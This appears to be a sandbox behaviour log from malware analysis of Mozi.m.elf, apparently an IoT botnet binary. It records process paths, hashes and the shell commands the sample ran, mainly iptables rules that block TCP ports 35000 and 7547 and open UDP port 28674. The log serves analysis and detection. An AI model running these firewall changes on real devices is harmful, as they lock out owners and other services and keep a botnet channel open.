                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I INPUT -p tcp --dport 7547 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:21
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:21
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I INPUT -p udp --destination-port 28674 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:21
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:21
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I INPUT -p udp --destination-port 28674 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:21
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:21
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --source-port 28674 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:21
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:21
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I OUTPUT -p udp --source-port 28674 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:21
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:21
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 28674 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I PREROUTING -t nat -p udp --destination-port 28674 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 28674 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I POSTROUTING -t nat -p udp --source-port 28674 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I INPUT -p udp --dport 28674 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I INPUT -p udp --dport 28674 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --sport 28674 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I OUTPUT -p udp --sport 28674 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 28674 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I PREROUTING -t nat -p udp --dport 28674 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 28674 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:22
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I POSTROUTING -t nat -p udp --sport 28674 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:42:49
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/bin/dash
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:42:49
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/bin/rm
                                                              Arguments:rm -f /tmp/tmp.XlTs5dmQSe /tmp/tmp.5VLGGYD6OI /tmp/tmp.KMqOsJZXWu
                                                              File size:72056 bytes
                                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                              Start time (UTC):23:42:49
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/bin/dash
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:42:49
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/bin/rm
                                                              Arguments:rm -f /tmp/tmp.XlTs5dmQSe /tmp/tmp.5VLGGYD6OI /tmp/tmp.KMqOsJZXWu
                                                              File size:72056 bytes
                                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b